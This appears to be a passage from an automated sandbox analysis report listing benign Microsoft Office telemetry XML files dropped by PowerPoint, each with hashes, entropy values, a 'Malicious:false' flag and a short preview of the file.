                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500022" V="4" DC="SM" EN="Office.Feedback.InApp.ManifestV2" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b6pmi" A="b6pmh" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="ClientFeedbackId">.. <S T="1" F="ClientFeedbackId" />.. </C>.. <C T="W" I="2" O="true" N="FeedbackOrSurvey">.. <S T="1" F="FeedbackOrSurvey" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):635
                                                                                                                              Entropy (8bit):5.215264669354499
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdlN2lPQjP5iUvAQierDSVc6hz5i2YL2i28dLEj/1fUINO2su:2dn2lPoiUFrGVhjDM2DARg
                                                                                                                              MD5:388E2B682B728CB3A5B8B2DF100380AE
                                                                                                                              SHA1:3E0451649D177A601AFBCF45481153DB867A0734
                                                                                                                              SHA-256:C970B9FC371F3C07C1F9B9FAE88450A57E9007ADFDF3F530E5E00AA3BB2C8CA3
                                                                                                                              SHA-512:D0FD769CD57EC59EEF3B47358C46F83AFF2E94E8C347548BC20C56C076BD3878F674F76B2739487B3C31751DC52AAE9005C0333BA6B66AE0D3DFDA589102DC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500023" V="4" DC="SM" EN="Office.Feedback.InApp.PayloadSent" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bm22s" A="82pus 82puv 82puu 82put cl8f9 cl8ga cl8gb" />.. </S>.. <C T="I32" I="0" O="true" N="HttpStatusCode">.. <S T="1" F="HttpStatusCode" />.. </C>.. <C T="W" I="1" O="true" N="ClientFeedbackId">.. <S T="1" F="ClientFeedbackId" />.. </C>.. <C T="TAG" I="2" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1151
                                                                                                                              Entropy (8bit):5.172608606212303
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdTOSsAPQjP5iUvAQier69iIXFFCXyk02cNfUIdLi/Hp94fhns3fIyVInHxHZW:2dTOSsAPoiUFr69hvCC1LKk+ge6Bq9
                                                                                                                              MD5:371B0694728B35525464CCAB1D16479E
                                                                                                                              SHA1:BE18E7A77E1337C9B5F4F6BB0BD81FB56885F836
                                                                                                                              SHA-256:C3BAA4E8500C7ECA429BA97170965B54BB14DAE5B7965B51C1D621E3BB674535
                                                                                                                              SHA-512:F0D49CDBD4A5D8915BBDC8FCF8FC653005E3E23A2C8D6A70E43064810ACDD6801049A98AA48792A100FF1C3D13D2E108E875A03BB39ADC62FBEC728E193C0E42
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500024" V="3" DC="SM" EN="Office.Feedback.InApp.UI.Win32.TaskPane.HostedExperience" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="clmfh" A="clmfi clmfj clmfk clmfn clmfo clmfp clmfq clmfv clmfy 4ogd9 4ogee 4ogep" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="HostedSurveyTaskPaneException">.. <S T="1" F="HostedSurveyTaskPaneException" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="FeedbackType">.. <S T="1" F="FeedbackType" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="IsEmailIncluded">.. <S T="1" F="IncludeEmail" M="Ignore" />.. </C>.. <C T="B" I="4" O="true" N="IsScreenshotIncluded">.. <S T="1" F="IncludeScreenshot" M="Ignore" />.. </C>.. <C T="B" I="5" O="true" N="IsDiagnosticsIncluded">.. <S T="1" F="IncludeDiagnostics" M="I
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1063
                                                                                                                              Entropy (8bit):4.877471008035092
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdwhR+NZ1S4OAQ/Wner7erEuSerJoferwck/LvjE8nAqHaSMjiOHhSMp6lEHIJ:2dwh0NZ17arirPFrmWrYDvBPxkU
                                                                                                                              MD5:7B01E39448F246273FA3ECE463D7EEF4
                                                                                                                              SHA1:784555F27256B6B37B470A2FC89816EA2C20EA90
                                                                                                                              SHA-256:0B29B2155F3CB84285B3FF5BCF673E3C5468E3843C75713F8A3E08C1E86EDFEF
                                                                                                                              SHA-512:3C3C4FBE7AF26C671E033DFFD77EF4CC3461BB63E605442ACACA0C2F9CA6FDC9CF75A2698B34BB2A87ADD2B788ACB0724F0650685B6EA30E4CB654260A541F3E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510000" V="1" DC="SM" EN="Office.DynamicCanvas.HtmlNavigation" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" S="1" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjp8o" />.. <UTS T="2" Id="bj2rg" />.. <UTS T="3" Id="bj2rf" />.. <UTS T="4" Id="bjp8s" />.. <TI T="5" I="30min" />.. <A T="6" E="TelemetrySuspend" />.. <A T="7" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="CountNavigateErrors">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="CountNavigateToFallbackFailed">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="CountNavigateTimeOut">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="CountJavaScriptError">.. <C>.. <S T="4" />.. </C>.. </C>.. <T>.. <S T="5" />.. <S T="6" />.. <S T="7" />.. </T>.. <ST>.. <S T="1" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):935
                                                                                                                              Entropy (8bit):4.9829472302134485
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdXDa2x+NZ1S4OAQ/Wner5lV9S6dTE7WNoSdydtlImXdUMDd+D9tbImFdmrvio:2dzCNZ17yr5PRHbGb9h+RPcAgOa3
                                                                                                                              MD5:BE12374E21E42CEC968B153A14897105
                                                                                                                              SHA1:C730FAFBE476F46E081E20DE8226F3ED57602A2B
                                                                                                                              SHA-256:A5BB9D4FEE4660F165FBBD7D3E9C85502FEDB2E50BEE7363AA16C76E3B3220D4
                                                                                                                              SHA-512:0E034C863C806A0B1A3A9F87636D3BD19954B705D06F8AE06C8E6A8547909906DCA4F233BECBFE8A3E36292600A252569F6D0E3E8811077D3ED6C2D8BDE5C07D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510005" V="1" DC="SM" EN="Office.DynamicCanvas.CanvasLaunches" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" S="100" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="blgb5" />.. </S>.. <C T="FT" I="0" O="false" N="LaunchTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="false" N="Surface">.. <S T="1" F="Surface" />.. </C>.. <C T="W" I="2" O="false" N="CampaignId">.. <S T="1" F="CampaignId" />.. </C>.. <C T="W" I="3" O="false" N="MessageId">.. <S T="1" F="MessageId" />.. </C>.. <C T="W" I="4" O="false" N="CampaignName">.. <S T="1" F="CampaignName" />.. </C>.. <C T="W" I="5" O="false" N="ContentName">.. <S T="1" F="ContentName" />.. </C>.. <C T="U8" I="6" O="false" N="ContentNumber">.. <S T="1" F="ContentNumber" />.. </C>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):754
                                                                                                                              Entropy (8bit):5.027376168514338
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdLZa2g+NZ1S4OAQ/WnerflVXS6dTE7WNoSdydtlImXdUMDaD6SIm8HNUlu:2ddPNNZ17yrfPfHbGb9WWR
                                                                                                                              MD5:2E98D809B0E5ECDFE76DF6322A5A185A
                                                                                                                              SHA1:02351CCA959819953D92365CD2FEA0B67784E6EE
                                                                                                                              SHA-256:138AE5BD4A71602D3B781319713604A500A0A8E1A8925405734F1A89767A8E35
                                                                                                                              SHA-512:BC72F714C3A1BFAB2340088B626742E7EA94954C659553B0C4B8C34A28C52A3B84E30A9A21DB42327042D5B30523094B2DF51668386D9F6B0AF65243008A5020
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510006" V="0" DC="SM" EN="Office.DynamicCanvas.CanvasResults" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" S="100" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="boldw" />.. </S>.. <C T="FT" I="0" O="false" N="ResultTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="false" N="Surface">.. <S T="1" F="Surface" />.. </C>.. <C T="W" I="2" O="false" N="CampaignId">.. <S T="1" F="CampaignId" />.. </C>.. <C T="W" I="3" O="false" N="MessageId">.. <S T="1" F="MessageId" />.. </C>.. <C T="U8" I="4" O="false" N="Result">.. <S T="1" F="CampaignStatus" />.. </C>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):766
                                                                                                                              Entropy (8bit):5.059081210311511
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdbPg+NZ1S4OAQ/Wner27swTEhodLStbImFdy95rvirgM45rhirTd+xSMfrcxN:2dbPNNZ17yrkx1OPqAGaR+QMTc3
                                                                                                                              MD5:A20D967DCD7B87CB59409F0AD8F537D0
                                                                                                                              SHA1:D6343ACDC3ACEFDDB04289F8655B71D3E154DD60
                                                                                                                              SHA-256:A797466703ECE8F1C0A31B77B852316F4ABB0B801E9AE2290FEED60129EBF616
                                                                                                                              SHA-512:A90EF1FA2F2C1E8D19793DD6037C1F3457FD48E8431FF4F64091D19EB851320D026A09C325373E4A0B90DC535259628B9DCEAE9EDEAC912732CF231AFA3A6B39
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510008" V="0" DC="SM" EN="Office.DynamicCanvas.LaunchEvents" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" S="100" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b3gp1" />.. </S>.. <C T="W" I="0" O="true" N="TriggerEvent">.. <S T="1" F="TriggerEvent" />.. </C>.. <C T="W" I="1" O="true" N="CampaignName">.. <S T="1" F="CampaignName" />.. </C>.. <C T="W" I="2" O="true" N="ContentName">.. <S T="1" F="ContentName" />.. </C>.. <C T="U32" I="3" O="true" N="ContentNumber">.. <S T="1" F="ContentNumber" />.. </C>.. <C T="W" I="4" O="true" N="CanvasType">.. <S T="1" F="CanvasType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):858
                                                                                                                              Entropy (8bit):5.020221704375508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdEUag+NZ1S4OAQ/WnerMAswTEhodLStbImFdy95rvirgM45rhirTd+xSMfrcY:2dEFNNZ17yrXx1OPqAGaR+QMTc8T
                                                                                                                              MD5:5D856E9DFACF6CED2A4AFF242ACE70B8
                                                                                                                              SHA1:F66BF3509CFF40F54B994095EC7A2F72FB904A49
                                                                                                                              SHA-256:D55F4EA86D17D9CFAF597D7AB417903CDD8E73ECFB393B611D127C9C202834BF
                                                                                                                              SHA-512:EA0B1D7D527739ABF22747D814DFEBBD7A7D53C93A286487DC7395A8E4CEFF312DFD05020DB7B380D57DB179D5D097C83132A08269F296B8D717EA0662F266A7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510009" V="0" DC="SM" EN="Office.DynamicCanvas.ResultEvents" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" S="100" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b3gp2" />.. </S>.. <C T="W" I="0" O="true" N="TriggerEvent">.. <S T="1" F="TriggerEvent" />.. </C>.. <C T="W" I="1" O="true" N="CampaignName">.. <S T="1" F="CampaignName" />.. </C>.. <C T="W" I="2" O="true" N="ContentName">.. <S T="1" F="ContentName" />.. </C>.. <C T="U32" I="3" O="true" N="ContentNumber">.. <S T="1" F="ContentNumber" />.. </C>.. <C T="W" I="4" O="true" N="CanvasType">.. <S T="1" F="CanvasType" />.. </C>.. <C T="U8" I="5" O="true" N="CampaignStatus">.. <S T="1" F="CampaignStatus" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):697
                                                                                                                              Entropy (8bit):5.121186837956521
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdKXty+NZ1S4OAQ/WnerWH5KfHxdLStbImFdy95rvirgM45rhirTNO2su:2dKXBNZ17yrWHIvrOPqAGa5
                                                                                                                              MD5:8FDFEC7D5485A84E0254E8D47A8E2F16
                                                                                                                              SHA1:2643B2CFA60707E0059330E4EAA4F0AA987558BC
                                                                                                                              SHA-256:C8AD700BD6E45478512F20A142F98EA0464337B6BF1819C6A2D2DCFB9B9AC780
                                                                                                                              SHA-512:D590DB4493F54C702940F99B8FE96DDF3FBC8A85DB56558F4DAF9E73DEE8257C58FB87A33020E6FEB6B67FE64813ACF7D7A94301A4F4B52C408673C7EEFB6C45
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510010" V="0" DC="SM" EN="Office.DynamicCanvas.TeachingUIDismissalType" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" S="100" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b3wrp" />.. </S>.. <C T="U8" I="0" O="true" N="DismissalType">.. <S T="1" F="DismissalType" />.. </C>.. <C T="W" I="1" O="true" N="CampaignName">.. <S T="1" F="CampaignName" />.. </C>.. <C T="W" I="2" O="true" N="ContentName">.. <S T="1" F="ContentName" />.. </C>.. <C T="U32" I="3" O="true" N="ContentNumber">.. <S T="1" F="ContentNumber" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3550
                                                                                                                              Entropy (8bit):4.310010877279268
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cWGNZ1h3uXDfktVDfCODfRXr22XvEwJLbCrs2llXT:DWLtuQetj
                                                                                                                              MD5:0AD4165B2BC9065634C990B2B8145CCD
                                                                                                                              SHA1:772A5C167F58F76B47587CE752838A0918F9A99A
                                                                                                                              SHA-256:BA8468111E95DA9EFA5FA66F100837BF41690E042515B37CFED287BFB61DC3A6
                                                                                                                              SHA-512:71B7A8886992138F5C988E5C36D9B279377EE2D5FBC062D83415991FA95E35AF27CAC62AD4A2D15AD8A6F6032070D68EF529EFD74B912DB0F71DCB4206E79B40
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510012" V="1" DC="SM" EN="Office.DynamicCanvas.OutSpaceCanvas" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b3wqw" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="CampaignName" />.. </L>.. <R>.. <V V="ProgressUi" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ContentName" />.. </L>.. <R>.. <V V="ProgressUi" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="CampaignName" />.. </L>.. <R>.. <V V="ProgressUi" T="W" />.. </R
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5190
                                                                                                                              Entropy (8bit):4.642296307351512
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c8a0NZ1WxVdhplQcUo/LYmbnHT6Hze1acRNv1mHwhZ1y0SU8Zqa3WE91VHhcQ5BI:faALcQHwy6E9tT5BIp8+WEZG5O
                                                                                                                              MD5:5129AEBF9A1A4F3A16318866CFF36C88
                                                                                                                              SHA1:BEA06819C2FCF80E8822CD9B5AD2B378B439BBCF
                                                                                                                              SHA-256:0FB407BA6760E64129D427DD192776DF9EB538DE663A601CC1E6054083AE75E9
                                                                                                                              SHA-512:7550C74F143936F655BF43B99D0AFEB6ADE545400E77C336F0F437E644778BF287C0B727A3B64915A43D5D84F7E8417E35AD1D1D4C8F6388C86427F54AF7F644
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510014" V="2" DC="SM" EN="Office.DynamicCanvas.ShareWithMeetingHealth" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cf6ef" />.. <UTS T="2" Id="cf6eg" />.. <UTS T="3" Id="cf6eh" />.. <UTS T="4" Id="cf6ei" />.. <UTS T="5" Id="cf6ej" />.. <UTS T="6" Id="cf6ek" />.. <UTS T="7" Id="cfya0" />.. <UTS T="8" Id="cfya1" />.. <UTS T="9" Id="cfya2" />.. <UTS T="10" Id="cfya6" />.. <UTS T="11" Id="cfya8" />.. <UTS T="12" Id="cfyap" />.. <UTS T="13" Id="cfyaq" />.. <UTS T="14" Id="cfyas" />.. <UTS T="15" Id="cfyat" />.. <UTS T="16" Id="cfyau" />.. <UTS T="17" Id="cfyav" />.. <UTS T="18" Id="cfyax" />.. <UTS T="19" Id="cfyba" />.. <UTS T="20" Id="cfybb" />.. <UTS T="21" Id="cfybd" />.. <UTS T="22" Id="cfybe" />.. <UTS T="23" Id="cfybf" />.. <UTS T="24" Id="cfybg" />.. <UTS T="25" Id="cfybh" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):456
                                                                                                                              Entropy (8bit):4.593271194347315
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdKZberpspSndLpSImFdy9pSirgM4pSirTNO2su:2dKUrplWGS5
                                                                                                                              MD5:F97353CE2BB4015776DD1A32AECDBB26
                                                                                                                              SHA1:8B1F9FE296AF7C6B5330A6B373137D942D7584B6
                                                                                                                              SHA-256:650C5530466701CCF4D2F98BB87A6E231FE3F1234C4A99F6D3BD4B673D1FCDD4
                                                                                                                              SHA-512:D9C7195EC125865783745A7D620E2179933A29C2AC660B2C012DD72BA71C3C651B21FEE9DA648160F43503FCEFE01538D49A5A0D976E7087C81B0BF160D3C920
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510015" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="b3wqw" />.. </S>.. <C T="W" I="0" O="true">.. <S T="1" F="ContextData" />.. </C>.. <C T="W" I="1" O="true">.. <S T="1" F="CampaignName" />.. </C>.. <C T="W" I="2" O="true">.. <S T="1" F="ContentName" />.. </C>.. <C T="U32" I="3" O="true">.. <S T="1" F="ContentNumber" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3600
                                                                                                                              Entropy (8bit):3.3411610829488017
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2djHuypQ+O9sAjctindSoD7U19Km5FsaJUamWFpR:cjuycTW9XSA
                                                                                                                              MD5:BE8286CD624B7212A86103F18469A5CD
                                                                                                                              SHA1:84DF873438BD936901264683800919225608AAB8
                                                                                                                              SHA-256:2F16CCDC915609D77E49B305A1A8093D4F6EF18578D6C9BEFCAF96A4F56C1A22
                                                                                                                              SHA-512:AEB8DD5D4E7CAB3A1AA6B6B426F4C3251FC014FB1C9510719B3B92422F230FD83856E3E13A6630594CA26F0D6E60A1AE62F3F28F5ADF8940763AFF2BBD6AD70E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510016" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="510015" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="1" />.. </L>.. <R>.. <V V="pptshare-meetingpicker" T="W" />.. </R>.. </O>.. </F>.. <SR T="3" R="clearAllButton">.. <S T="2" F="0" />.. </SR>.. <SR T="4" R="clickBack">.. <S T="2" F="0" />.. </SR>.. <SR T="5" R="clickHistory">.. <S T="2" F="0" />.. </SR>.. <SR T="6" R="presentationDismissed">.. <S T="2" F="0" />.. </SR>.. <SR T="7" R="selectButton">.. <S T="2" F="0" />.. </SR>.. <SR T="8" R="shareInitiated">.. <S T="2" F="0" />.. </SR>.. <SR T="9" R="toggleConflictVisibility">.. <S T="2" F="0" />.. </SR>.. <SR T="10" R="toggleConflicts">.. <S T="2" F="0" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="0" />.. </C>.. <C T="W" I="1" O="true">.. <S T="2"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):814
                                                                                                                              Entropy (8bit):4.843318669148307
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdX1FM373R+NZ1S4OAQ4Wni0j+u/qNOZfX/c//bLMpONws2oydLStbYxdy95ri:2dX1XNZ17Wyuyovi8BOIq0l
                                                                                                                              MD5:689B4FFE9501FF6FE9185CA88E594DDC
                                                                                                                              SHA1:7B0547F37311AD44D47A37D3BBB228ADC0E13F3E
                                                                                                                              SHA-256:EBCF6DDCC439A43506BF49658F20764E7D5816A94F9ECD5F8D27F4781958832C
                                                                                                                              SHA-512:6108994138084BAF54CD93A2FFF37D10474057466ED267730C75689C95618679059822C5A2C9F31D20A50A63AAC9B3B6C56CB3196D3F241FF21610A6E4F367B1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510017" V="0" DC="SM" EN="Office.DynamicCanvas.MeetingPicker.Unexportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="510016" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="11" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="true" N="ContextData">.. <S T="2" F="0" />.. </C>.. <C T="W" I="1" O="true" N="CampaignName">.. <S T="2" F="1" />.. </C>.. <C T="W" I="2" O="true" N="ContentName">.. <S T="2" F="2" />.. </C>.. <C T="U32" I="3" O="true" N="ContentNumber">.. <S T="2" F="3" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1448
                                                                                                                              Entropy (8bit):4.855936026523147
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dy1+NZ17WyuyovjuBOIq0Q1OkiW0isq1zz:cO+NZ13uyo7J0chrH
                                                                                                                              MD5:D8192762507BEA939B8069D73BA68BEE
                                                                                                                              SHA1:CBF9EE7B12C9DC95DDDFDBC38C8C50D19ADD0E2B
                                                                                                                              SHA-256:7EF213BFA57B6BCE3C211CBA508C8F9A69803B5794ECC554B0A79BDC0C4EFF9C
                                                                                                                              SHA-512:F61EEDCA9B8D16A9CC8D545E9D71B03D91499377A8D13ABBEE2D5B4A47E234FF5DFD8E135E4BA880EAB4E13EAA10537383C0FDB147E288AA3713843493728241
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510018" V="0" DC="SM" EN="Office.DynamicCanvas.MeetingPicker.Exportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="510016" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="11" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="true" N="ContextData">.. <S T="2" F="0" />.. </C>.. <C T="W" I="1" O="true" N="CampaignName">.. <S T="2" F="1" />.. </C>.. <C T="W" I="2" O="true" N="ContentName">.. <S T="2" F="2" />.. </C>.. <C T="U32" I="3" O="true" N="ContentNumber">.. <S T="2" F="3" />.. </C>.. <C T="U32" I="4" O="true" N="ClickDismissAllMeetingsButton">.. <S T="2" F="4" />.. </C>.. <C T="U32" I="5" O="true" N="ClickGoBackToCurrentPresentationButton">.. <S T="2" F="5" />.. </C>.. <C T="U32" I="6" O="true"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2271
                                                                                                                              Entropy (8bit):4.957794389842405
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dRLKNZ17VrkrIrTrdrDr3rCr6HH6DuD1D0kDqv62mM3AqDXDAfsYlEDUQw99NkA:cINZ1hI8PxvLWuHTJgk46839IOUQE9qE
                                                                                                                              MD5:DC950513F4562C2A64F737864C8B3362
                                                                                                                              SHA1:69306807DC43A6ACB2824E8D042016E31B38FE54
                                                                                                                              SHA-256:09DC31DBABCDC807286ADDD6C3C3BF5EF4585BAF01150E82BC32D8EAD331A02F
                                                                                                                              SHA-512:DD731981D667DA63C7CDEBDD3BF8BCC005C53B561C4AFC1FDBFFA748C061D06CA2851EFB117FAA065EDE1171C0E33B54722F694D7332A7B937C99EB8A263DD11
                                                                                                                              Malicious:false
